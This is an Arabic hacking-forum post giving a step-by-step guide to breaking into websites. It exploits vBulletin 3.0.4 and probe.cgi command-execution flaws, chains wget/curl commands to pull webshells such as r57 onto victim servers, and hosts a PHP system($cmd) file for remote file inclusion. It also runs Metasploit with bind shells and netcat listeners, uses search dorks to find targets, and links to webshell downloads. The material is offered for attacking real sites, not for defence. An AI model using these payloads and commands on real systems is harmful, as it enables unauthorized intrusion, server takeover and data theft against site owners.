التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 07-26-2009, 12:50 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية LAV4
 

 

 
إحصائية العضو







LAV4 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
LAV4 is on a distinguished road

افتراضي :: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ...


::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ...

شرح هذا تعبة والله عليه علي شانكم وشي ثاني ذكر حقوق الكاتب

الي جمع لكم دروس
والي صحيح يبي يكون هكر يفهم شرح زين لو كام طويل بس مفيد



وكمــا تري ... إن إصدار 3.0.4 من المنتدي يوجد له ثغرتان....

الآن بعد ما نضغط على زر الثغره

vBulletin <= 3.0.4froumdisplay.php"Code Execution ( Part2)

راح يطلع لك التالي ...











و كود الثغرة بيظهر على حسب الثغره بالـ Perl ولا بالـ php ولا مكتوب الاستغلال على طول من المتصفح كما فى المثال بتاعنا ...

( وسأوضح بعض الثغرات المختلفة , وكيفية التعامل معها )

المهــــــــم ... راح يطلع الكود التالي ...


Exploit:
--------------

كود PHP:

http
://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')." 

Conditions
---------------- 
1st condition     $vboptions['showforumusers'] == True the admin must set 
            showforumusers ON in vbulletin options


2nd condition     $bbuserinfo['userid'] == you must be an visitor/guest

3rd condition     $DB_site->fetch_array($forumusers) == True when you 
            visit the forums
it  must has at least one user show the forum

4th condition     magic_quotes_gpc must be OFF 

SPECIAL condition 
you must bypass unset($GLOBALS["$_arrykey"]) code in 
            init
.php by secret array GLOBALS[]=;))) 
طيب وش معناه الكلام ذا ؟!,,
يقولك إن الثغره تستغلها عن طريق إضافة الرابط هذا ...


كود PHP:

http
://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')." 
وتحط بدال site الموقع المستهدف ومعطيك شروط لاشتغال الثغره ... بس إنت ما عليك منه ... رح طبق وشف وش يصير ...

......... طبعا مو شرط تستخدم هذه الثغره فقط .........

... كل موقع أو كل إصدار وثغراته ...

طيب نروح للمنتدى ونكتب بعده الكود اللي عطانا ...


مثل ما قلنا بالأول إنه فرضاً اسم الموقع http://www.admin.com/

ولنفرض انك ضغطت على رابط المنتدى وصار اسم المجلد vb يعني صار الرابط www.admin.com/vb

نضيف الرابط بعده

كود PHP:

http
://www.admin.com/vb/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')." 

وتشوف مكان id ...ونضع مكانه أوامر اللينكس ( وسأشرح كيفية استخدام هذه الأوامر )
طيب بعد ما كتبت id وطلع لك مثلا ...
uid=100(apache) gid=500(apache) groups=500(apache)

او


uid=100(nobody) gid=500(nobody)


كويس تنفذت الثغرة ... وعطاك رد وهو ... إن حالتك نو بدي (nobody) على السيرفر ,,,

وإذا ما نفعت الثغرة دي ... شوف غيرها , وغيرها , وغيرها ووو وابحث فى كل مواقع الـ Security عن ثغرة لهذا الإصدار من المنتدي...

وأكمل شغلك ... وإذا ما لقيت ثغرة لهذا الإصدار من المنتدي ... شوف باقي البرامج , والخدمات ... اللي شغالة... عـ الموقع....

ودور لها علي ثغرات .....

*** فقـــط ... أكمل , وتابع الشرح , وإن شاء الله ... هتعرف كل شئ ببساطة ***

المهـــــــــــــــم !!!
هنفترض إن الثغرة اشتغلت معانا ....


الحين اكتب pwd ( مكان الـ id ) لمعرفه مكانك على السيرفر ...

كود PHP:

http
://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('pwd')." 
لاحظ !!! قمنا بحذف id ( الموجودة فى آخر الكود ... فى المستعرض )وكتابة pwd

وبعد معرفة مكـــانك على السيرفر ... ( يعني إنت موجود الآن فى مجلد إيه !!! ... على السيرفر )


قم بتنفيذ هذا الأمر ls -al عشان تشوف المجلدات والملفات وتصاريحها ودور علي مجلد يحمل تصريح 777 وبتشوف قدامه drwxrwxrwx

هذا على طول تدخله

وتسحب له الشل بطريقه هذي


cd أمر الدخول
ومثلاً قالك مسارك على السيرفر كذا بعد ما كتبت pwd


/home/domains/admin.com/public_html/vb

وشفت إن مجلد اسمه data يحمل التصريح 777
تروح تكتب الأمر التالي علشان تدخل مجلد الـ data مثلاً
cd home/domains/admin.com/public_html/vb/data
لازم تكتب الأمر اللي فوق وتشبك فيه أمر السحب بعد عشان ينفذ أمرين الدخول و السحب , ويكون بالطريقه هذي,,,


كود PHP:
cd home/domains/admin.com/public_html/vb/data;wget http://members.com/shell.zip;ls -al 


لو لاحظتوا كل أمر نفصله بهذي العلامة ; وزدنا أمر استعراض الملفات أيضا ... يعني بينفذ كذا أمر مع بعض ,,, فى وقت واحد....

لاحــــــــــظ!!!


أمر الدخول أو الانتقال لمجلد معين cd +

أمر السحب
wget http://members.com/shell.zip +

أمر الاستعراض ls -al


طبعا إنت تكون رافع الشل وضاغطه في ملف مضغوط وتسحبه على السيرفر بالطريقه اللي وضحتها

وإذا شفته انسحب ... أوكيه ... إذا ما انسحب تأكد من صلاحية الأمر

wget بكتابه الأمر التالي:::


which wget


إذا عطاك مسار مشابه لهذا


/usr/da/


يعني اوكي شغال .... ((( شغـــال , ولا سواق ... هههههه )))


أو جرب باقي أوامر السحب مثل curl و get و lynx كل هذي تأدي الغرض وتفك مشاكل كثيرة يعانون منها المبتدئين...

جرب الأداة curl
وتسحب بالطريقه هذي...

curl -o shell.zip www.members.com/shell.zip

أو بـ get
بالطريقه التالية :::

GET www.members.com/shell.zip > shell.zip

أو بـ lynx
بالطريقه التالية :::

lynx -source www.members.com/shell.zip > shell.zip



بعد ما سحبته واستعرضت وشفت إن الملف موجود .... تكتب الأمر هذا unzip ... لفك الضغط عن الشل...

cd home/domains/admin.com/public_html/vb/data;unzip shell.zip;ls -al

طبعا لازم تكتب أمر الدخول كل مره ... بس تضيف عليه اي أمر إضافي لأنك تبي تطبق على المجلد اللي يحمل التصريح ...

مش على المجلد اللي إنت فيه


طيب بعد ما فكيت الشل وصار shell.php


تروح تطلبه من المتصفح وبعدها شوف الموقع قدامك بمكانك ...افعل ما أردت ... عن طريق أوامر اللينكس

( سوف تجد في أسفل الموضوع شرح للـ Shell + أوامر اللينكس )

وأيضاً ...

اضغط هنـــا لتحميل الكتاب باللغة الإنجليزية

اضغط هنـــا لتحميل الكتاب باللغة الإنجليزية



وكده إحنـــا قمنا باستغلال ثغرة من ضمن الثغرات الموجودة في منتدي Vb 3.0.4 ومن خلالها قمنا برفع شل وطبقنا أوامرنا وووو ....

وأيضاً ممكن تستغل ألبوم الصور إذا موجود فى الموقع 4images : وده له ثغرات , وممكن تبحث عنها بنفس الطريقة السابقة ...

وأيضاً ممكن تستغل سجل الزوار : نروح نشوف له ثغرات ؟؟ إذا كان له ثغرات أوكي ... نبحث , ونطبق وإذا ماله انتقل للي بعده...

وأيضاً ممكن تستغل باقي الخدمات الموجودة على الموقع ... وتعمل بحث علي كل برنامج أو ثغرة أو خدمة معينة ... ووو ...

* طبعاً إنت بتشوف الخدمات اللي شغالة علي الموقع أو تعمل عليها Scan مسح كما ذكرنا سابقاً , وبعد كده تروح تبحث علي ثغرات لهذه الخدمات , بنفس طريقة البحث اللي شرحناها *

*******************

والآن !!! سأوضح بعض الثغرات المختلفة , وكيفية التعامل معها ....



( وبإمكانك مراجعة درس استغلال نقاط الضعف + طريقة البحث عن الثغرات فى مواقع الـ Security ... وستجد فيه بعض من أنواع الثغرات

المختلفة + طريقة البحث عنها أيضاً , وكيفية التعامل معهــا )

المهم
بنشرح عمل ثلاث أنواع من الثغرات وهي ما تسمى...



(( Remote command exucetion )) & (( Remote File Inclusion )) & (( Framework ))



وهي تسمح لك برفع شل أو باكدور أو أو أو ,,,,,,الخ
أول حاجه لازم يكون عندك شل Shell مرفوع بموقعك أو احد المواقع,,,

مثل هذا الشل الروسي r57 مثلاً , أو Ch99 ... ( سأوضح أنواع الشل ... + روابط لتحميلها ...لاحقاً )

المهم ...

================================================== =========
================================================== =========



النوع الأول ثغرات Remote command exucetion



================================================== ========
================================================== ========

طيب خلينا نجيب ثغره ونطبق ... وعنوان الثغرة كذا ...مثــلاً ...

Probe.cgi Remote Command Execution



يعني بملف Probe.cgi فيه ثغره رموت كومند Remote Command حلو ...طيب خلونا نشوف الاكسبلويت

( السورس بتاع الثغرة .... )



Authors ....... spher3 (spher3 at fatalimpulse dot net)
Date .......... 04-07-2005
Product ....... probe.cgi
Type .......... Remote Command Execution

o Info:
================
That script is used to open file '.dat'.

o Vulnerable Code:
================
..
23 [...]
24 $old = $query->param('olddat');
25 [...]
..
..
34 [...]
35 open (VF, "$olddat");
36 [...]
..

(24) At this line, the cgi param 'olddat' is associated to one database.
This variable isn't checked by anyone matching, so you can open
all file that you want. (35) At this line the script open the file
that you had chosen. With pipe `|`
is possible to execute arbitrary code on the shell.


o Proof of concept:
================

http://the-vuln.site.org/cgi-bin/probe.cgi?olddat=|id|
uid=99(www) gid=99(www)





لو تقرأ بأعلى موضح لك الملف ونوع الثغرة ,,,,, طيب احنا عوزين الاستثمار ...

استثمارها هنا بالسطر ده ...



http://the-vuln.site.org/cgi-bin/probe.cgi?olddat=|id|



the-vuln.site.org.<<===الموقع المستهدف وهو افتراضي

cgi-bin<<===مجلد الـ cgi-bin

probe.cgi<<===الملف المصاب

olddat<<===مكان الاصابه داخل الملف ومو شرط نفس الاسم ممكن يتغير
===============

طيب نبغى نعرف كيفية عملها اوكي

اولاً ... تسوي بحث بالطريقه هذي

allinurl:probe.cgi

أو اي طريقة تحب

لنفرض اننا حصلنا علي موقع



http://www./???.com/cgi.bin/probe.cgi?grid=ThaiGrid



كويس أول حاجه نضع



|id|



بيطلع بالشكل



www.???.com/cgi.bin/probe.cgi?grid=|id|


واعطيه انتر بيظهر لك مثلا كذا

uid=99(www) gid=99(www)

هذا صفتك ( صلاحيتك ) بالسيرفر


طيب نبغى نعرف مكاننا وين ( يعني احنا في أى مجلد علي السيرفر )



ضع مكان الـ id


pwd



www.???.com/cgi.bin/probe.cgi?grid=|pwd|



بيطلع معك مثلا...



/home/.???/cgi.bin



طيب نبغى نشوف مسموح لينا نرفع ملف ولا لا؟

ضع مكان الـ id



which wget



بالشكل,,,,,,,,,



www.???.com/cgi.bin/probe.cgi?grid=|which wget|



إذا ظهر لك كدا ...



/؟؟؟/؟؟؟/wget



وعلامات الاستفهام متغيرة يعني أهم شئ wget تظهر ... فإذا ظهرت ... فاعرف إن وضعك زي الـفــل...

يعني مسموح لك ترفع ملف ... انبسط ياعم ...

طيب نبغى نعرف التصاريح : permits للمجلدات والملفات عشان نشوف وين المسوح لينا بالرفع

لو ترجع احنا قلنا مكاننا وين هنا



/home/.???/cgi.bin



طيب احنا نبغى نخرج من مجلد cgi.bin للديكويتري ( المجلد ) الرئيسي ... حلو !

نضع مكان الـ id



cd /home/.???/;pwd



يعني بيكون بالشكل



www.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/;pwd|



الآن بيرجعنا إلى ...



home/.???/



حلو الآن ... نبغى نشوف المجلدات والملفات و التصريحات بالأمر ...



;ls%20-al



بيطلع كذا,,,,,



www.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/;ls%20-al|



بتظهر لك ملفات ومجلدات الموقع وأمامهم تصريحاتهم...

إنت ابحث عن المجلد اللي له التصريح



drwxrwxrwx = 777



لنفرض انك حصلت أمام مجلد الصور أو uploads تصريح ( drwxrwxrwx = 777 )

أولا ... لازم تخش عليه ... تعمل



cd home/.???/uploads/;pwd



www.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/uploads/;pwd|



حلو بيكون وضعك بالشكل



home/.???/uploads/



يعني داخل مجلد uploads

الآن كل ما عليك رفع الشل ... طبعا لك شل مرفوع بأحد المواقع ... يعني نفترض رابط شيلك Your Shell



www.XXX.com/r57shell.zip



وتبغي ترفعه على الموقع اللي اخترقته ... بيكون بالشكل ده ......



www.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/uploads/wget www.XXX.com/r57shell.zip*|



واعطيه انتر Enter بيظهر لك :::



r57shell.zip



طيب نبغى نفك الضغط عنه بالأمر unzip



www.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/uploads/unzip r57shell.zip*|



وديلو إنتر Enter بيطلع معك :::



r57shell.php



وألف مبروك خش وافتحه بالمتصفح وتمتع وبيكون الرابط

www.???.com/uploads/r57shell.php

( سأشرح ... كيف تتعامل مع الشل Shell , وكيف تستخدم أوامره , وما الذي تفعله بعد رفع الـ Shell ... لاحقاً )



================================================== ========================
================================================== ========================



ننتقل للقسم الثاني وهي ثغرات Remote File Inclusion



================================================== ========================
================================================== ========================


الثغرات المسماه Remote File Inclusion شبيهه بعمل Remote Command Execution

بس الفرق يلزم كود لرفعه لموقعك ومن ثم تأخذ رابطه وتستخدمه لاستثمار أو الهجوم

خلونا نأخذ مثال للتوضيح ... ولنأخذ هذه الثغرة ...مثال :::



الاستغلال :


http://www.target.net/index.php?mode.../evilcode?&cmd



لو تلاحظ بالاستغلال



http://evilcode?&cmd



http://evilcode = موقعك

?&cmd = كود مرفوع بموقعك :



**********

افتح النوت باد Notepad وادخل هذا الكود واحفظها باسم cmd.gif



<?
system($cmd);
?>

*/



**********

أنا رافعه على موقعي
http://members.lycos.co.uk/breeeeh/cmd.gif?&cmd=id



وعند الاستغلال



http://www.target.net/index.php?mode...md.gif?&cmd=id



الـ id بالآخر تضع مكانها أوامر اللينكس... ( كما شرحت فى الأعلي )



والفرق بين Remote Command Execution و Remote File Inclusion



أن Remote File Inclusion فيها كود ترفعه على موقعك وتستخدم الأوامر مكان الآي دي id ((رابط موقعك مع الـ id ))

و Remote Command Execution تستخدم أوامر اللينكس على طول بدون كود مرفوع (( الـ id فقط ))


================================================== ========================
================================================== ========================



ننتقل للقسم الثالث وهي ثغرات مكتوبة بالـ Framework . ( وامتدادها بيكون pm )



================================================== ========================
================================================== ========================
أولاً : حمل برنامج Metasploit Framework من هـنـــا



بعــد تثبيت البرنامج ...

بإمكانك تشغيل البرنامج عـ ( الـ Windows )...

وبالمناسبة ... أوامر البرنامج ثابتة ... سواء فى اللينكس , أو الويندوز ...

ودلوقتي خلونا نشوف شرح للبرنامج , وكيفية استخدامه , من عـ الـ Windows ....



روح لمكان البرنامج ... علي هذا المسار ...



C:Program Files/Metasploit Framework



( إذا كنت الويندوز موجود فى الـ C ) أما إذا كان الويندوز موجود فى الـ D بيكون المسار كالتالي :::



D:Program Files/Metasploit Framework

.............



واضغط على أيقونة البرنامج الموضح بالصورة :::




أو ممكن تذهب إلي قائمة Start ثم Programs ثم Metasploit Framework ثم MSFConsole ...



وبعد ما تضغط على أيقونة البرنامج هاتفتح معك الشاشة ... التالية :::



ونضع ملف الثغرة اللي احنا عايزنها في هذا المسار...



C:\Program Files\Metasploit Framework\home\framework\exploits



مع ملاحظة ::: الثغرة هاتكون بامتداد ((( pm )))






طبعا ممكن تفتح ملف الثغرة بالـ Notepad ... وبتلاحظ الاسم بتاع الثغره بأعلى الاكسبلويت...





للتشغيل الثغره اكتب الأمر زي ما هو



use php_vb3_0_6





طيب هنستعرض الخيارات المتاحة لنا للتطبيق بالأمر...



show payloads






ظهر لنا الخيارات وهنختار منها cmd_generic بالأمر...



set PAYLOAD cmd_generic





طيب هنشوف الخيارات التي بداخل الخيار cmd_generic بالأمر



show options



حلو جداً ,,,,,, نستخدم الخيارات بالترتيب بالأوامر


set RHOST server's IP



server's IP <<-------------- آي بي IP ::: الموقع المستهدف



,,,,,,,,,,,,,,



set RPATH /vb/misc.php



vb/misc.php<<-------------مكان الإصابة وهو متغير



,,,,,,,,,,,,,,

وأيضا الأمر...



set RPORT 80



,,,,,,,,,,,,,



وبعده الأمر



set LHOST myIP



myIP<<-------------- الآي بي IP بتاعك


,,,,,,,,,,,,,



وأيضا الأمر



set LPORT 1234



والبورت أنت حٌر ... ممكن تغيره ... بس لازم هو نفسه عند الاتصال بالنت كات


,,,,,,,,,,,,,



والآن ... استخدم أوامر اللينكس بالأمر ...



set CMD id



والآن شوفوا الصورة عند استخدام الأوامر



الآن روح وافتح النت كات وتنصت به ... بالأمر



nc -vv -l -p 1234



لاحظو ... البورت هو نفسه اللي بالأول وضعناه...



,,,,,,,,,,,,,



وأخيراً ... نستخدم الأمر ...


exploit





وانتظر,,,,,هتظهر النتيجة بالنت كات

طبعا الشرح كله كافتراضي للتطبيق على احد الثغرات
المهم نفهم طريقة التطبيق لان فيه ثغرات جميله مكتوبة بالــFramework



*******

وهذا شرح ثاني لثغرة مكتوبة بـ برنامج Metasploit Framework



وطبعاً هي بامتداد pm



واسم الثغرة ::: futuresoft_tftpd.pm



وهذا هو رابط الثغرة ( افتحه ) ووو

futuresoft_tftpd_pm.txt


وانسخ كامل كود الاستغلال إلى ملف نصي , ونسمي الملف futuresoft_tftpd.pm


لأن كود الاستغلال يبدأ بـ Msf::Exploit::futuresoft_tftpd ولأن فيه كلمة MsF Exploit تبقي الثغرة مكتوبة ببرنامج Metasploit Framework



ولازم يكون امتدادها pm ... لذلك احنا كتبنا اسم الملف وأضفنا إليه .pm

futuresoft_tftpd.pm


انسخ الملف futuresoft_tftpd.pm إلى المجلد الخاص بثغرات البرنامج

C:\Program Files\Metasploit Framework\home\framework\exploits


-


والآن شغل Metasploit Framework , من قائمة start ثم Metasploit Framework وشغل MSFConsole
ستبدأ نافذة الدوس Dos في الظهور بشعار Metasploit ,,, نبدأ بتنفيذ الأوامر

1- الأمر الأول use وهو لتحديد اسم الثغرة التي سنستخدمها وهي futuresoft_tftpd لاحظ بدون pm
بمعنى أول أمر نستخدمه هو : use futuresoft_tftpd وستلاحظ تغير سطر الأوامر إلى msf futuresoft_tftpd >
لاحظ الصورة:




ثانياً: أمر show أو العرض ينقسم إلى 3 أنواع :::
الأول ::: show options وهو لإظهار وتحديد اختيارات الثغرة مثل رقم المنفذ Port وعنوان ip
الثاني ::: show payloads لإظهار وتحديد الشل كود shellcode الذي ستقوم بتنفيذه
الثالث ::: show targets لإظهار الهدف المحدد مثل نظام تشغيل أو تطبيق ويب مع تحديد الإصدار

نبدأ بأول نقطة : نفذ show options وستلاحظ ظهور 3 خصائص :::
1 SSL وهذا الاختيار لا نستخدمه إلى إذا كان الموقع يستخدم شهادة التحقق https
2 رقم ip و 3 البورت Port وتلاحظ أن البورت محدد 69 ,,, لاحظ كيف سنقوم بإعادة التحديد

لتحديد ip الموقع المستهدف ... سنستخدم أمر جديد وهو set , لاحظ سنحدد ip و port
بهذا الشكل set RHOST 127.0.0.1 و set RPORT 69 لاحظ الصورة



بعد ذلك تحديد payloads أو shellcode ويوفر Metasploit أنواع كثيرة وإحترافية للـ shellcode
لرؤيتها وتحديدها نفذ الأمر show payloads
لاحظ سنقوم باختيار الشل كود المعروف لفتح منفذ جديد أو باب خلفي للدخول للجهاز وهو win32_bind
نفذ الأمر set PAYLOAD win32_bind لاحظ الصورة التوضيحية:

بعد ذلك تحديد الهدف targets , نفذ الأمر show targets لعرض أنواع الهدف وفي مثالنا
الأهداف المتوفرة :
0 - Windows 2000 Pro English ALL
1 - Windows XP Pro SP0/SP1 Englis
2 - Windows NT SP5/SP6a English
3 - Windows 2003 Server English
ونستطيع تحديد الهدف , لاحظ سنقوم باختيار WinXP sp0/sp1 بمعنى الاختيار 1
بهذا الشكل :::

set TARGET 1
-
وبعد الانتهاء من إعدادات الثغره , نفذ أمر show options , للتأكد من كل الخصائص
بهذا الشكل :::





وبهذا نكون انتهينا وللتطبيق تأكد أن النظام winxp sp0 أو sp1 وأن البرنامج :::

TFTP Server 2000 Evaluation Version 1.0.0.1 شغال عـ الموقع
والآن نفذ الثغره باستخدام الأمر exploit



وبهذا نكون أخذنا فكرة عن أداة أثبتت جدارتها في عالم الأمن وهي Metasploit Framework



ولا تستغرب إذا كان فيه فرق بين الشرح الأول لـ Metasploit Framework والشرح الثاني ...

* فالطريقة الأولي صحيحة , وسهلة ,,, وأيضاً الطريقة الثانية كذلك *


وبالتوفيق للجميع ....



***********************

*************

******

*





$*******$



طيب الحين خلصنا من الاختراق عن طريق السكربتات اللي مركبه على الموقع ,,,

وأيضاً ... اتعرفنا علي بعض الثغرات المهمة جداً , وعرفنا كيف نقوم باستغلالها ...


ننتقل لمرحله أكثر تقدم ....
نروح لموقع netcraft.com

وتكتب في مربع البحث اسم الموقع اللي تبيه...
بيطلع لك معلومات الموقع من الـ IP للموقع والخدمات المركبه على السيرفر ... وهكذا ... ومثلاً عطاك المعلومات التالية :::


202.75.49.183 Linux Apache/1.3.34 Unix mod_ssl/2.8.25 OpenSSL/0.9.7a PHP

/4.4.2 mod_perl/1.29 FrontPage/5.0.2.2510



نأخذه وحده وحده
النظام بيشتغل على Linux
ومركب سيرفر Apache إصدار 1.3.34
أول شي تشوف لينكس وثغراته زي ما تعلمنا قبل كده ...
بعدين انتقل للأباتش ودور له علي ثغرات تناسب الإصدار الموجود ,,, وإذا ما لقيت أو ما ضبط ... انتقل للي بعده...
mod_ssl/2.8.25 مود يتركب على سيرفر الأباتش وشف له ثغرات...
OpenSSL/0.9.7a دور له علي ثغرات
PHP/4.4.2 دور له علي ثغرات

طبعاً ... إنت بتدور علي الثغرات ... بنفس الطريقة اللي قلنا عليها قبل كده ...

عن طريق البحث فى مواقع السيكيورتي....

وعلي فكرة ... لو قدرت تبحث وتطلع ثغرات للخدمات الموجودة علي الموقع مثل : Appache أو OpenSSL/0.9.7a أو mod_ssl/2.8.25 أو أو أو

وعرفت تطبقها ... أعتقد إن إنت كده أصبحت ((( هاكر ::: بدائي ))) يستطيع أن يكون محترف

خلوا بالكوا ... ((( هاكر ::: بدائي ))) وليس محترف ... لأن عالم الاختراق ... ملئ بالاكتشافات... والمواهب , والأفكار الجديدة...

والمحترف ... هو اللي بيكون صاحب هذه الاكتشافات , والمواهب , والأفكار الجديدة ....


$*******$

وهــا هو شرح الـشــــل...

ما هو الشل؟؟؟؟ هو عبارة عن سكربت مكتوب بلغة phpshell ويعمل الشل كوسيط بينك وبين النظام الذي هو Linux

حيث يستقبل الأوامر منك ويرسلها إلى السيرفر المخترق وتعرض نتائج الأوامر على الشل...

والآن ما الفائدة منه؟؟؟ لان الكل يسمع عن الشل وما يعرف شنو استخداماته؟؟ وأنا أقولك له استخدامات كثيرة

فنحن الهاكرز نستخدمه في السيطرة على السيرفرات ......

والآن جينا للمفيد يستخدم للسيطرة على السيرفر وأحياناً السيطرة بشكل كامل على السيرفر والتنقل بالسيرفر وتصفح ملفاته والتعديل عليها وهذا حسب صلاحياتك على السيرفر

وأكيد راح تقولي شنو صلاحياتي ؟؟ وأنا أقولك الصلاحيات يعني شنو إنت على السيرفر اي شنو موقعك من الإعراب هههههههههه وإليكم أنواع الصلاحيات على السيرفر

1_ Root اي أنت مدير السيرفر يعني خلاص ما في شي يوقف قدامك تحذف تعدل تضيف حساب على السيرفر وكذا ......

2- User هنا صلاحياتك على الموقع اللي إنت رفعت عليه شل فقط ... أكرر على الموقع اللي إنت رفعت عليه شل فقط ...

اي تعدل تعطي تصاريح إلا إذا انتقلت لحالة الرووت

3- nobody, http, apache هنا كلها نفس الشئ ما تقدر تحذف ملفات أو تعطي تصاريح للملفات ولكن هذه الصلاحيات فيها ميزة حلوة وهي

انك تقدر تتصفح الحسابات اللي على السيرفر اي المواقع التي على السيرفر عكس صلاحيات اليوزر حيث صلاحياتك على الموقع اللي إنت رفعت عليه شل فقط

ولكن في سؤال مهم وهي أكيد إنت راح تقولي كيف اعرف صلاحياتي على السيرفر؟؟؟ وأنا أقولك وإنت في الشل تكتب id لمعرفة صلاحياتك

؛؛؛ وهو أمر لينكس ؛؛؛

درسنا ممل اليوم ههههههههههه اتحملوني يـا شباب أنا أخوكم معلش ...

ومن الكلام اللي سبق أكيد إنت استنجت شئ ... وهو انك حتى تشغل الشل لازم ترفعه على موقع

وأكيد في سؤال بالطريق وهو كيف ارفع الشل على موقع؟؟؟

وأنا أقولك ولا يهمك يتم رفع الشل عن طريق الثغرات وأكيد راح تسأل وتقول وش هي الثغرة؟؟؟؟ وأنا أجاوبك مع انك مللتني من كثر أسألتك ههههههههههه

الثغرة: وهي عبارة عن خطأ برمجي وضعف أمني يساعدك في دخول نظام معين واختراقه .....

وأحيانا تساعدك الثغرة في الانتقال من حالة إلى أخرى أي مثلا من نوبدي nobody إلى رووت Root حسب نوع الثغرة .....

والثغرات تكون مكتوبة بلغة السي C أو البيرل Prel أو php الخ.....

والآن الحمد لله عرفتوا شنو الثغرة ......

ولنفترض إنك تمكنت من رفع شل على موقع ولكن أكيد إنت تبي تعرف أنواع الشل؟؟ وأنا أقولك إنت تأمر ...

بعض الأنواع:


1- webadmin هذا الشل جيل ومفيد للمبتدئين لأنه يسمحلك برفع الملفات وحذف الملفات وإنشاء مجلد بكل سهولة ولتطبيق أمر معين مثلا

على ملف كل ما عليك هو انك تضغط على المكان الفارغ أمام الملف المراد التعديل عليه واختار اللي تبي تعديل حذف او غيره كذلك تستطيع

حذف مجلد كامل فهو لا يحتاج إلى أوامر لينكس.
http://www.i-saudi.com/lezr.com/webadmin.zip


2- MyShell هذا الشل جميل ولكن قديم وهو يعتمد على أوامر لينكس ويمكنك معرفة صلاحياتك بجانب الجملة Current User ومعرفة كل المجلدات الذي في المجلد الذي تتصفحه ورابط التحميل للشل http://www.i-saudi.com/lezr.com/MyShell-1.0.6.zip


3- phpRemoteView شل جميل ومشابه لخصائص الشل webadmin وكل مجلد تود التعديل عليه استخدم الأسهم المقابلة لها ولكن هذا الشل فيه ميزة جميلة وهي انك تقدر تفك تشفير الــ md5 الخاصة بالمنتديات.http://www.i-saudi.com/lezr.com/phpRemoteView.zip


4- phpshell-1.7 شل جميل وشبيه بالشل MyShell مفيد للمبتدئين
http://www.i-saudi.com/lezr.com/phpshell-1.7.zip



5- phpFileManager شل سهل جدا وأوامره واضحة ولا يحتاج إلى شرح
http://www.i-saudi.com/lezr.com/phpF...ager-0.9.3.zip



6- r57shell الشل الروسي الغني عن التعريف الذي أنا أفضله من بين كل هذه الشلات وهو يحتاج إلى أوامر لينكس ولكن فيه أوامر البحث عن

ملفات الكونفج وأوامر سحب الملفات اي الدوال لسحب الملفات جاهزة كلها وفيه ميزة تحميل ملفات من جهازك إلى الموقع المخترق من خلاله

فقد أضيفت له ثغرات وشغلات جميلة اكتشفها بنفسك ولكن سوف اشرح لكم هذا الشل في نهاية درسنا الممل هههههههههه



7- phplab شل جميل ولكنه غير عملي ولا انصح المبتدئين به
http://www.i-saudi.com/lezr.com/phplab.zip

8- haexplorer شل أيضا جميل ولكن غير عملي ولا انصح المبتدئين باستخدامه
http://www.i-saudi.com/lezr.com/haexplorer.zip

9- php exploit lab شل أيضا جميل ولكن أيضا لا انصح المبتدئين به
http://www.i-saudi.com/lezr.com/explorer.zip

10- Ch99 شل جميل ورائع وفيه مميزات جميلة وهي إنك تقدر تخترق قاعدة البيانات من خلاله عن طريق الاختيار sql وهذا الشل يسمحلك

بتطبيق أوامر لينكس ... بالإضافة إلى إمكانية تصفح الملفات من خلاله كما في الشل webadmin ولكن باختيارات أوسع ...

&&&

والآن الحمد لله الكل عرف الشل وأنواعه واستخدامه ولكن في سؤالين مفيش حد سألهم...

وهي أني من خلال الشرح تكلمت عن شغلتين وهي التصاريح؟؟؟ودوال سحب الملفات؟؟؟

بالنسبة للتصاريح وأوامر اللينكس فبإمكانك معرفتها من كتاب اللينكس الشامل والذي وضعته قبل ذلك - هنـا -

وبقي شي واحد وهو دوال السحب وسوف اشرحها بالتفصيل في درسنا اليوم ... لاحقا في وقتها.

وشباب أكيد مليتوا وأنا أنصحكم روحوا اشربوا فنجان قهوة وارجعوا ههههههههههه

نكمل ... والآن بعد ما الكل عرف ما هو الشل وأنواعة واستخداماته ......

راح اشرح لكم الشل الروسي r57 اللي أنا أفضله بين الشلات Shells الباقية


إليكم شرحه بالصور:



والآن إليكم الشرح حسب الترقيم في الصورة :::


1- phpinfo هنا لمشاهدة البرامج المثبتة على السيرفر ...


2- Safe Mode السيف مود هو حالة آمنة يتم تفعيلها على السيرفر لمنع تطبيق الدوال.


3- إصدارة اللينكس للسيرفر المخترق مع آخر تحديث له وهو 2005 .


4- id وهو كما ذكرت صلاحياتك على السيرفر وهي هنــا nobody نو بدي .


5- pwd مسارك على السيرفر اي مكان تواجدك .


6- ملفات السيرفر وهي ظاهرة في الصورة واليكم تكملة شرح الشل شوفوا الصورة:


1- هنا تكتب أمر اللينكس مثلا id لمعرفة صلاحياتك


2- هنا المسار الذي إنت عليه أو اكتب pwd لمعرفة مسارك


3- هنا للتنفيذ اي عند كتابة أمر اللينكس اضغط على هذا المستطيل (بالعربي اكتب الأمر واضغط انتر) مثل هذا الأمـر مثلاً....

cd home/domains/admin.com/public_html/vb/data;wget http://members.com/shell.zip;ls -al


والآن أشرح لكم دوال سحب الملفات ...

والآن إليكم الشرح وسوف أشرح على الدالة wget ... في البداية كشرح خفيف لمعرفة أن الدالة wget شغالة

يجب كتابة الأمر which wget وشوفوا الصورة:




وكما تلاحظون كتبنا الأمر which wget في مربع تنفيذ الأوامر ونضغط انتر Enter وشوفوا النتيجة




والآن كما تلاحظون ظهر لنا الرد الذي في الصورة وهو usr/bin/wget/ اي أن الدالة شغالة ,,, والآن نكتب أمر السحب ولكن قبل كل ذلك يجب

أن تتأكد من أن المجلد الذي سوف تسحب الشل له ؛ يملك التصريح 777 ... شوفوا الصورة :::




